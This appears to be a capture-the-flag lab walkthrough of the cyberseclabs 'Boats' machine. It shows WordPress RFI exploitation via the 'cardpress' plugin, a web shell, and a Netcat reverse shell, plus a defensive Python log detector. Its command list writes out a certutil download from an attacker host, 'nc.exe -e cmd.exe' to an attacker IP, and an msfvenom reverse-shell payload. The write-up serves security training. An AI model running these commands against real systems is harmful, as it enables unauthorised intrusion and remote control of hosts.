Introduction

In this walkthrough, we go over a machine on cyberseclabs called Boats. We performed a typical penetration test and found a Windows machine hosting a WordPress installation, together with a phpMyAdmin instance that allows unauthenticated logins.

Machine Name: Boats

Difficulty: Easy

Skills Learned

  • WordPress Penetration Testing
  • PhpMyAdmin

Reconnaissance

The first thing I always do is run a scan to see what I’m up against. I used a tool called Nmap to find open ports and services on the machine. The scan showed me that the machine was running a Windows operating system with an Apache web server, MySQL, and WordPress. This gave me a good starting point.

Probing the Web Server

With a WordPress site in my sights, I started looking for common web vulnerabilities like XSS or SQL injection. I tried a few things, but the website had some decent security and was validating my inputs, so no luck there.

My next move was to use a specialized WordPress scanner called WPScan. This tool is great for finding known vulnerabilities in WordPress itself, as well as its themes and plugins. The scan revealed that the site was using an outdated and vulnerable plugin called “cardpress.”

Exploitation

A quick search for the “cardpress” plugin vulnerability told me it was susceptible to Remote File Inclusion (RFI). This is a serious flaw: the plugin passes a URL into a PHP include, so the server can be made to fetch a PHP file from a host the attacker controls and execute it.

To exploit this, I set up a simple web server on my machine to host a malicious PHP web shell. Then, I crafted a special URL that used the RFI vulnerability to make the target server download and execute my shell. And just like that, I had a web shell, giving me command-line access to the server!

Getting a Better Shell

The web shell was good, but I wanted a more stable and interactive connection. So, my next step was to get a reverse shell. I set up a listener on my computer using Netcat and then used the web shell to download a Windows version of Netcat onto the target machine.

Once the Netcat executable was on the target, I ran a command to make it connect back to my listener. Success! I had a full reverse shell.
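As an added example (not part of the original walkthrough), here is a small Python detector for the two traces this attack chain leaves behind: a WordPress plugin request whose query parameter carries a remote URL (the RFI step), and a certutil -urlcache download on the Windows host (the Netcat transfer). The log lines are constructed, and the plugin script name `view.php` and parameter name `page` are placeholders, not the real cardpress request format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (not from the box); the request to
# view.php?page= is a placeholder shape for a remote-include attempt.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/cardpress/readme.txt HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/cardpress/view.php?page=http://10.0.0.9:8000/shell.txt HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?s=hello HTTP/1.1" 200 2048
"""

# Common Log Format: client, identity, user, [timestamp], "METHOD target proto", status
REQ_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL is the signature of an RFI attempt.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client, path, param, value) for every request whose query
    string hands a remote URL to the application."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed access-log records
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((m.group("src"), parts.path, key, value))
    return hits


# Constructed process command lines, as a Sysmon Event ID 1 or Security 4688
# record would carry them; the first is the download step from the walkthrough.
PROCESS_LOG = [
    "C:\\Windows\\System32\\certutil.exe -urlcache -f http://10.0.0.9/nc64.exe nc.exe",
    "C:\\Windows\\System32\\whoami.exe /priv",
    "C:\\Windows\\System32\\certutil.exe -hashfile C:\\file.txt SHA256",
]
# certutil with -urlcache and a URL argument is a file download, not its normal
# certificate-management use (the -hashfile line above is left alone).
CERTUTIL_DL = re.compile(r'certutil(\.exe)?\b.*-urlcache\b.*\b(https?|ftp)://', re.IGNORECASE)


def find_certutil_downloads(cmdlines):
    """Return the command lines that use certutil as a downloader."""
    return [c for c in cmdlines if CERTUTIL_DL.search(c)]


if __name__ == "__main__":
    for hit in find_rfi_attempts(ACCESS_LOG):
        print("possible RFI:", hit)
    for cmd in find_certutil_downloads(PROCESS_LOG):
        print("certutil download:", cmd)
```

On a real host the same checks would run over the Apache access log and the endpoint's process-creation events; the RFI rule is only meaningful if the server still has allow_url_include enabled, which is the setting that makes this class of bug exploitable in the first place.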

Privilege Escalation

Usually, after getting a shell, the next step is to find a way to escalate my privileges to the administrator or “root” level. However, when I checked my user privileges, I was pleasantly surprised to find that I was already running as “system”! This is the highest level of privilege on a Windows machine, so my work was done.

I also briefly mentioned a couple of other ways I could have approached this, like using Metasploit to create a payload or exploiting an unauthenticated PHPMyAdmin instance I found, but the method I chose was clean and effective.

Commands I Used

Here are the technical commands I used in the terminal during the demonstration:

  • nmap -sS -Pn [IP address]
  • nmap -sC -sV [IP address]
  • sudo wpscan --url [WordPress URL]
  • sudo wpscan --url [WordPress URL] -e ap
  • python3 -m http.server 8000
  • nc -lvnp 4545
  • systeminfo
  • sudo mv nc /var/www/html
  • sudo service apache2 start
  • certutil.exe -urlcache -f http://[Attacker IP]/nc64.exe nc.exe
  • nc.exe -e cmd.exe [Attacker IP] 4545
  • whoami /priv
  • whoami
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Attacker IP] LPORT=4545 -f exe -o shell.exe

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
